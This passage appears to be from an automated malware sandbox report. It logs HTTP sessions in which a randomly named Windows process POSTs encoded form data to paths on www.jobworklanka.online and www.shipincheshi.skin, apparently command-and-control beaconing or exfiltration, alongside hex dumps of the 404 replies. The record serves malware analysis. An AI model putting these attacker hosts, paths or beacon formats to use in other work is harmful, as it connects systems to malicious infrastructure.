                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              25192.168.2.44976791.184.0.200805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:07:18.346549988 CEST713OUTPOST /c85h/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 200
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.jobworklanka.online
                                                              Origin: http://www.jobworklanka.online
                                                              Referer: http://www.jobworklanka.online/c85h/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Raw: 33 74 56 3d 70 61 78 56 6d 6a 71 6f 2b 39 64 78 78 66 36 36 30 48 46 62 7a 51 75 61 37 73 75 68 6e 74 2f 79 43 4f 7a 6b 67 66 4d 2f 49 37 4e 49 56 77 54 4e 67 6b 34 52 6b 37 51 70 72 76 6b 6e 68 39 6f 34 45 52 7a 73 67 75 4f 46 48 37 56 65 79 6c 30 30 56 52 36 74 78 46 43 53 46 31 71 54 6c 79 36 4e 67 50 39 76 6c 2f 6c 55 4e 2f 51 43 75 4b 41 37 66 62 4f 75 7a 68 70 63 7a 39 48 4b 33 31 51 48 65 4f 4e 56 72 66 4b 38 6b 2b 74 6d 6a 59 58 73 62 53 41 72 66 69 46 4e 6f 63 67 58 46 72 71 7a 4e 62 58 2b 76 32 74 78 4f 61 39 66 36 31 30 65 31 78 32 2f 39 76 2b 4c 4f 69 62 4e 50 34 2b 64 49 67 3d 3d
                                                              Data Ascii: 3tV=paxVmjqo+9dxxf660HFbzQua7suhnt/yCOzkgfM/I7NIVwTNgk4Rk7Qprvknh9o4ERzsguOFH7Veyl00VR6txFCSF1qTly6NgP9vl/lUN/QCuKA7fbOuzhpcz9HK31QHeONVrfK8k+tmjYXsbSArfiFNocgXFrqzNbX+v2txOa9f610e1x2/9v+LOibNP4+dIg==
                                                              Sep 12, 2024 15:07:18.982920885 CEST500INHTTP/1.1 404 Not Found
                                                              Date: Thu, 12 Sep 2024 13:07:18 GMT
                                                              Server: Apache
                                                              X-Xss-Protection: 1; mode=block
                                                              Referrer-Policy: no-referrer-when-downgrade
                                                              X-Content-Type-Options: nosniff
                                                              X-Frame-Options: SAMEORIGIN
                                                              Content-Length: 196
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              26192.168.2.44976891.184.0.200805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:07:20.965218067 CEST733OUTPOST /c85h/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 220
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.jobworklanka.online
                                                              Origin: http://www.jobworklanka.online
                                                              Referer: http://www.jobworklanka.online/c85h/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Raw: 33 74 56 3d 70 61 78 56 6d 6a 71 6f 2b 39 64 78 67 4f 71 36 31 67 78 62 78 77 75 64 33 4d 75 68 73 4e 2f 2b 43 4f 50 6b 67 65 4a 36 49 4a 70 49 55 56 2f 4e 68 6c 34 52 6c 37 51 70 6a 50 6b 6d 38 74 6f 4a 45 52 50 4f 67 75 79 46 48 37 42 65 79 6b 45 30 56 41 36 75 77 56 43 55 4a 56 71 4e 37 43 36 4e 67 50 39 76 6c 2b 42 71 4e 38 67 43 75 36 77 37 65 36 4f 74 73 52 70 54 77 39 48 4b 7a 31 51 63 65 4f 4d 6c 72 65 47 61 6b 37 78 6d 6a 5a 6e 73 62 41 6f 71 56 69 46 58 6c 38 68 6e 42 6f 65 36 44 72 6d 57 70 55 31 72 43 70 6c 2b 79 54 6c 45 6b 41 58 6f 76 76 61 34 54 6c 53 35 43 37 44 55 54 6d 34 71 32 67 51 59 50 4e 47 45 32 78 68 6b 6f 4f 6b 55 34 71 45 3d
                                                              Data Ascii: 3tV=paxVmjqo+9dxgOq61gxbxwud3MuhsN/+COPkgeJ6IJpIUV/Nhl4Rl7QpjPkm8toJERPOguyFH7BeykE0VA6uwVCUJVqN7C6NgP9vl+BqN8gCu6w7e6OtsRpTw9HKz1QceOMlreGak7xmjZnsbAoqViFXl8hnBoe6DrmWpU1rCpl+yTlEkAXovva4TlS5C7DUTm4q2gQYPNGE2xhkoOkU4qE=
                                                              Sep 12, 2024 15:07:21.647376060 CEST500INHTTP/1.1 404 Not Found
                                                              Date: Thu, 12 Sep 2024 13:07:21 GMT
                                                              Server: Apache
                                                              X-Xss-Protection: 1; mode=block
                                                              Referrer-Policy: no-referrer-when-downgrade
                                                              X-Content-Type-Options: nosniff
                                                              X-Frame-Options: SAMEORIGIN
                                                              Content-Length: 196
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              27192.168.2.44976991.184.0.200805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:07:23.516911030 CEST10815OUTPOST /c85h/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 10300
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.jobworklanka.online
                                                              Origin: http://www.jobworklanka.online
                                                              Referer: http://www.jobworklanka.online/c85h/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Raw: 33 74 56 3d 70 61 78 56 6d 6a 71 6f 2b 39 64 78 67 4f 71 36 31 67 78 62 78 77 75 64 33 4d 75 68 73 4e 2f 2b 43 4f 50 6b 67 65 4a 36 49 4a 68 49 56 6a 72 4e 67 43 45 52 6d 37 51 70 74 76 6b 37 38 74 6f 75 45 52 6e 4b 67 75 2b 2f 48 34 35 65 30 33 4d 30 41 43 43 75 36 56 43 55 55 6c 71 51 6c 79 37 48 67 50 74 72 6c 2f 78 71 4e 38 67 43 75 35 6f 37 5a 72 4f 74 2f 42 70 63 7a 39 48 47 33 31 52 7a 65 4b 68 64 72 65 53 73 6c 49 70 6d 6d 4a 33 73 5a 31 30 71 54 79 46 4a 32 4d 68 2f 42 6f 44 69 44 72 4b 30 70 56 42 56 43 76 5a 2b 77 6b 45 62 30 43 72 31 75 35 32 68 4f 79 71 53 4f 63 54 4d 62 30 30 5a 6e 43 30 79 64 73 36 62 77 41 78 74 74 74 49 46 6c 73 45 45 34 46 6b 45 4e 6d 5a 69 64 48 34 77 45 61 6b 2b 70 49 4e 70 6c 2b 7a 55 36 33 4d 2b 78 4e 5a 2f 5a 55 47 4f 4d 48 6e 76 33 2b 76 4c 63 67 78 61 7a 5a 56 35 66 5a 58 31 6a 71 52 66 6b 55 39 30 4b 55 41 65 6e 64 49 75 68 39 6e 62 63 2b 65 68 58 37 59 55 32 44 70 44 2b 45 31 36 34 64 33 42 39 32 64 5a 62 4c 2f 74 53 79 6d 39 74 62 43 4c 54 47 39 46 33 53 [TRUNCATED]
                                                              Data Ascii: 3tV=paxVmjqo+9dxgOq61gxbxwud3MuhsN/+COPkgeJ6IJhIVjrNgCERm7Qptvk78touERnKgu+/H45e03M0ACCu6VCUUlqQly7HgPtrl/xqN8gCu5o7ZrOt/Bpcz9HG31RzeKhdreSslIpmmJ3sZ10qTyFJ2Mh/BoDiDrK0pVBVCvZ+wkEb0Cr1u52hOyqSOcTMb00ZnC0yds6bwAxtttIFlsEE4FkENmZidH4wEak+pINpl+zU63M+xNZ/ZUGOMHnv3+vLcgxazZV5fZX1jqRfkU90KUAendIuh9nbc+ehX7YU2DpD+E164d3B92dZbL/tSym9tbCLTG9F3SCq1oA89YV9OjO4X2LP6/QihrX5lzmMiUdyxuf1Tg+QwMSD7dT+G1SJj0oOqcIJqKNp2dHCmuOOofkJ6hXocD3QdcIUkXxqDGLA399PwERPs6FQhsrM9w9SmVgWUZIiw8T6yPm53d0EKJH7VRkc9IKV/pPmH8i2D6pZdzkDiHGxG2PK0qsnCV9zgY5srHAX6IcdvgFfV6COEoT9Xy+51mNL/yB41HDmS4Fox0bli0zZKMG8WSiqmajDMWd/9841royTSymUGewRJ0qm/wsqtFXXqoiROUUGRFSOFmrq/irQVHnoFKtm25MjnsqaiIKcdX+6PPoN/yT58rBQO32Dvmw15cZQWUIzplaN8iFxC8CBeumfKwXrkP+OUNvjl3RELCwXSEjavo3VnvsLN//9XzPf4AXmjGLSMGz07qmASnyXrweaaXKQ+xXVhhGHzApnguKh57Qnouw3Bu4r6ojylyKZCj5Cx5ld9tDvHzgxGmao65g1PpLaY3D8jpyj25ljikWeZDhxywNWk0gIPM5i+4LwjlLB8LDqE8OHEvTTT176usTNRwCXzfkVlLUPfXfnmVK2YcMAwqwTqkYLxVei/5gptqmyU3zVvCQgEIghqtEOUODasNP0svUWyf78jO5x7b+aVEKmQfTHKDtxgOnl9c1lApMK4o7GnNSM [TRUNCATED]
                                                              Sep 12, 2024 15:07:24.253087044 CEST500INHTTP/1.1 404 Not Found
                                                              Date: Thu, 12 Sep 2024 13:07:24 GMT
                                                              Server: Apache
                                                              X-Xss-Protection: 1; mode=block
                                                              Referrer-Policy: no-referrer-when-downgrade
                                                              X-Content-Type-Options: nosniff
                                                              X-Frame-Options: SAMEORIGIN
                                                              Content-Length: 196
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              28192.168.2.44977091.184.0.200805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:07:26.061320066 CEST438OUTGET /c85h/?IhkTb=xPfHG0o8kZI8&3tV=kYZ1lXq/hdZH/uis+T00xzejxPvlo8rfV8miq8Z/KrwXBz2m8C0A0d48n8FfouwDJQDRltn1A61Jy1UNPVSm21uxUE+/nj7G5dxHpoV9EucdjLBiC53j1jk= HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Connection: close
                                                              Host: www.jobworklanka.online
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Sep 12, 2024 15:07:26.675591946 CEST500INHTTP/1.1 404 Not Found
                                                              Date: Thu, 12 Sep 2024 13:07:26 GMT
                                                              Server: Apache
                                                              X-Xss-Protection: 1; mode=block
                                                              Referrer-Policy: no-referrer-when-downgrade
                                                              X-Content-Type-Options: nosniff
                                                              X-Frame-Options: SAMEORIGIN
                                                              Content-Length: 196
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              29192.168.2.449771154.23.176.197805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:07:31.903901100 CEST707OUTPOST /25kr/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 200
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.shipincheshi.skin
                                                              Origin: http://www.shipincheshi.skin
                                                              Referer: http://www.shipincheshi.skin/25kr/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Raw: 33 74 56 3d 44 44 79 35 63 45 41 78 35 34 37 35 73 47 32 2f 4b 4b 41 7a 45 6a 51 6e 42 37 55 34 69 31 47 2b 57 36 56 64 56 72 4f 6d 66 31 30 6b 6e 41 31 6f 52 34 62 4e 6d 74 78 42 47 62 76 6e 68 79 63 52 69 62 59 31 38 61 61 76 38 70 34 71 4a 6f 64 49 6b 58 4a 43 73 70 70 77 77 58 49 4c 53 43 36 6c 79 6d 4a 47 6b 6c 76 6f 7a 49 47 57 4b 6e 31 39 2f 47 54 53 46 36 63 6f 77 56 55 4f 2b 57 78 65 30 74 2b 4e 68 49 4e 67 6d 70 51 50 78 55 64 44 67 51 65 42 2f 65 4d 4c 59 31 36 33 4b 74 65 45 36 6a 65 6d 37 6f 63 49 36 67 42 6c 56 57 33 44 6e 66 4f 5a 4f 32 32 61 6a 45 32 71 2b 56 77 73 30 41 3d 3d
                                                              Data Ascii: 3tV=DDy5cEAx5475sG2/KKAzEjQnB7U4i1G+W6VdVrOmf10knA1oR4bNmtxBGbvnhycRibY18aav8p4qJodIkXJCsppwwXILSC6lymJGklvozIGWKn19/GTSF6cowVUO+Wxe0t+NhINgmpQPxUdDgQeB/eMLY163KteE6jem7ocI6gBlVW3DnfOZO22ajE2q+Vws0A==
                                                              Sep 12, 2024 15:07:32.865859985 CEST1236INHTTP/1.1 404 Not Found
                                                              Date: Thu, 12 Sep 2024 13:18:44 GMT
                                                              Server: Apache
                                                              Upgrade: h2
                                                              Connection: Upgrade, close
                                                              Vary: Accept-Encoding
                                                              Content-Encoding: gzip
                                                              Content-Length: 4761
                                                              Content-Type: text/html; charset=utf-8
                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 5c 71 77 db 54 96 ff 7b f9 14 6f 4d c1 0e d8 92 ed 24 8e 9b 38 61 5c c7 49 0c 49 1c 1c a7 a5 4b bb 3e b2 f4 6c 8b c8 92 90 9e e3 a4 a5 e7 c0 ee 0c 30 bb 2d 85 81 65 da 5d 58 b6 70 0e e5 c0 4e 3b 3b 33 0b 0c 50 f6 cb d4 69 fa d7 7e 85 bd 4f b2 6c 59 7a 72 8c 0b 0e ac 72 92 58 4f f7 dd f7 bb f7 dd 7b df bd cf 92 32 7f bb 5c cc 95 cf 6f e5 51 83 34 95 a5 c7 32 ce 3f 2c 48 4b 8f 21 38 32 4d 4c 04 24 36 04 c3 c4 64 31 b4 53 5e 89 a5 43 dd 4b 44 26 0a 5e 7a f0 e7 6f 1f 7c fb 51 e7 fa 3b 0f de fb e8 e1 7b 37 8f ee de cd f0 f6 15 17 03 55 68 e2 c5 90 a1 55 35 62 86 90 a8 a9 04 ab c0 4e d5 64 55 c2 fb 51 55 ab 69 8a a2 b5 43 88 ef f6 32 c9 81 c3 81 1e fc 53 e8 8c 60 62 f4 14 df 6b aa 6a d2 01 ba dc 3b a5 87 a8 29 9a 31 8f 1e 9f 9e 9e 5e 18 b8 50 83 01 e7 51 22 a5 ef a3 b3 d8 90 04 55 88 a2 d0 1a 56 f6 30 91 45 01 6d e2 16 0e 45 51 c3 69 88 a2 ac 21 0b 4a 14 85 37 64 d1 d0 4c ad 46 d0 79 61 0d cb e1 28 32 05 d5 8c 99 d8 90 6b 83 43 34 05 a3 2e ab f3 28 3e d8 ac 0b 92 24 ab 75 [TRUNCATED]
                                                              Data Ascii: \qwT{oM$8a\IIK>l0-e]XpN;;3Pi~OlYzrrXO{2\oQ42?,HK!82ML$6d1S^CKD&^zo|Q;{7UhU5bNdUQUiC2S`bkj;)1^PQ"UV0EmEQi!J7dLFya(2kC4.(>$uhG8O)>5S3Kx%nm, lUUktN'$I"2wTqRX1&5"Kq1S&HjeT`` CILfDPs4.f<@=Y`6H5>2<lMUw_--V"BUoiPW?1nxl?Ty$h!'xW]5HmKVo2yYr0r.!*mhn!c#l0-xwkn!+59rh5iu4(T$IbH;h mAk73C:P0%4XJ:9wkQ<'@TFD&"C-0kxtOgZ&hK1Uo4Ovx;jtS4XF=H+ZSU4q30osWtN,RWKg.XU"_fpXX7Ch6lM$@yRH
                                                              Sep 12, 2024 15:07:32.866378069 CEST224INData Raw: 52 0f 31 60 b1 7c 54 9f 67 c8 6d ad 6a c7 2f 27 03 43 fc 4c b4 11 18 0d 12 01 45 06 8b 83 cf f6 7b 5a 05 26 83 01 9b c9 48 92 f7 e6 41 42 12 13 1b b2 22 31 dd c8 5e b4 47 5b 59 bb b4 43 16 57 d7 42 38 90 ce 9c 15 a0 82 84 54 d5 64 e7 34 b1 3d c1
                                                              Data Ascii: R1`|Tgmj/'CLE{Z&HAB"1^G[YCWB8Td4=sRY2yHk8"5y{bmCvc|M0T}q(X-RSqK.zDfSP<f;0en{r(#%t+`!%8k!c[+ch
                                                              Sep 12, 2024 15:07:32.867571115 CEST1236INData Raw: b3 65 83 30 35 3f 00 0a 58 b5 c1 76 fc ae 53 25 d3 4f fc 20 d3 6a 37 64 82 63 56 59 34 0f 11 99 3a c7 0f 80 33 62 9a e5 8e 1e 39 4d 3f b0 42 8d bf 18 12 9d 4b 43 6a 21 5f 10 1b 28 72 02 8a 49 ab 6b f0 fe 89 1b de f6 56 76 13 61 05 37 21 51 32 41
                                                              Data Ascii: e05?XvS%O j7dcVY4:3b9M?BKCj!_(rIkVva7!Q2AH\L8W"rKz@U@n*@;8]*x]WU+zn=tvnb- HwYhP[~x`kthE&n~=Aim"iY 4zP|`
                                                              Sep 12, 2024 15:07:32.867660999 CEST224INData Raw: b3 47 ca 90 7e a5 37 ec c8 10 23 00 22 91 96 a6 c9 59 40 2a 05 13 04 b2 5f 5e 3e 98 15 f3 d9 fd d9 99 b9 59 73 35 c9 3f f7 5c f6 52 fe a5 e7 d5 33 73 3b 33 72 62 15 9d 4b 9d 95 ce 1a c5 66 2d 11 df 55 b3 09 ad 34 53 dd 6c 92 fd 33 ab d5 3d b5 71
                                                              Data Ascii: G~7#"Y@*_^>Ys5?\R3s;3rbKf-U4Sl3=q DZjRags/s)]*{NMW+)Qk)s8NfYooHoO#8z74Q^Vk+&KlgB3ZtQ[L
                                                              Sep 12, 2024 15:07:32.868273973 CEST1236INData Raw: cd f9 24 ec 30 a7 69 bb f2 09 8d bd 8d 4d 93 16 f4 27 33 b6 01 29 13 5f b2 ab a2 9f dc 13 77 b6 f3 a5 31 5d 11 a2 3b b3 cf 98 96 7c 2c d4 b5 e2 46 7e 4c a8 7c 43 6b 62 7e d2 80 b7 73 a5 c2 56 b9 b2 99 1d 1f 77 7f 0d 9c 24 f0 52 fe f9 9d fc 76 b9
                                                              Data Ascii: $0iM'3)_w1];|,F~L|Ckb~sVw$RvS*K+RasuLv/DnDalT*\q}Lk-eW|i%9sc/|\Z{WFs"7|eX*:13}D1wWzQVjGFaslWI
                                                              Sep 12, 2024 15:07:32.868330956 CEST224INData Raw: 7a 27 74 88 2c 1e 51 dc 4c 58 22 05 4b 14 38 1b 01 03 c3 98 15 e7 b4 52 3d a8 58 7e ca 18 b2 6b a1 43 06 1e 47 c9 dd bb f7 47 9a 6e bf 8a ca 42 dd 52 10 03 d5 20 9a c1 33 03 93 96 a1 06 b9 56 cf 3b 83 34 23 18 62 c3 3e b1 75 12 a5 cf 5e 4e 31 34
                                                              Data Ascii: z't,QLX"K8R=X~kCGGnBR 3V;4#b>u^N14_jz1B06*z~_#T=Ci8^95Eq)@>7J0T:T~5P%72'Nj4YzVW!&~/9ZA=x-2N)&l
                                                              Sep 12, 2024 15:07:32.870918036 CEST610INData Raw: af f8 e5 f7 59 0c 9b 83 ab e7 29 aa a7 6d 6b 41 00 e1 1d 9b 8a 98 86 18 b5 ce 18 a1 de 74 a8 7b 41 45 04 c7 21 b8 ab ed 48 d8 26 08 7b 14 3d 70 62 93 70 82 79 a0 8a 74 5a c3 d6 a7 f0 02 8b 08 b0 d0 b3 45 04 1f 98 04 9a aa 68 82 d4 85 4f 8d a3 27
                                                              Data Ascii: Y)mkAt{AE!H&{=pbpytZEhO'+C@9(*"6)wnjmoRi-PiJ8jQ1)rB_n)kp7}<Do0`~hkTUDwX/\lr'pe


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              30192.168.2.449772154.23.176.197805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:07:34.452281952 CEST727OUTPOST /25kr/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 220
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.shipincheshi.skin
                                                              Origin: http://www.shipincheshi.skin
                                                              Referer: http://www.shipincheshi.skin/25kr/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Raw: 33 74 56 3d 44 44 79 35 63 45 41 78 35 34 37 35 73 6e 47 2f 4d 74 55 7a 4d 6a 51 6b 59 4c 55 34 77 31 47 79 57 36 70 64 56 71 36 4d 65 44 73 6b 6e 68 46 6f 51 39 37 4e 6a 74 78 42 66 72 76 6d 73 53 64 64 69 62 56 41 38 59 2b 76 38 74 51 71 4a 74 68 49 6b 6e 30 55 71 35 70 79 6c 48 49 4a 50 79 36 6c 79 6d 4a 47 6b 68 47 67 7a 4d 71 57 4b 58 46 39 2b 6e 54 52 45 36 63 72 6e 6c 55 4f 36 57 78 61 30 74 2b 56 68 4e 73 48 6d 71 6f 50 78 55 4e 44 67 6b 4b 47 6f 75 4e 43 48 6c 36 6b 4a 64 2b 4b 33 51 79 6d 78 4b 55 70 33 77 35 46 55 51 6d 5a 32 75 76 4f 63 32 53 70 2b 44 2f 65 7a 57 4e 6c 76 4e 55 57 41 77 59 63 66 46 58 31 4b 5a 43 51 55 50 52 59 54 67 38 3d
                                                              Data Ascii: 3tV=DDy5cEAx5475snG/MtUzMjQkYLU4w1GyW6pdVq6MeDsknhFoQ97NjtxBfrvmsSddibVA8Y+v8tQqJthIkn0Uq5pylHIJPy6lymJGkhGgzMqWKXF9+nTRE6crnlUO6Wxa0t+VhNsHmqoPxUNDgkKGouNCHl6kJd+K3QymxKUp3w5FUQmZ2uvOc2Sp+D/ezWNlvNUWAwYcfFX1KZCQUPRYTg8=
                                                              Sep 12, 2024 15:07:35.362529039 CEST1236INHTTP/1.1 404 Not Found
                                                              Date: Thu, 12 Sep 2024 13:18:46 GMT
                                                              Server: Apache
                                                              Upgrade: h2
                                                              Connection: Upgrade, close
                                                              Vary: Accept-Encoding
                                                              Content-Encoding: gzip
                                                              Content-Length: 4786
                                                              Content-Type: text/html; charset=utf-8
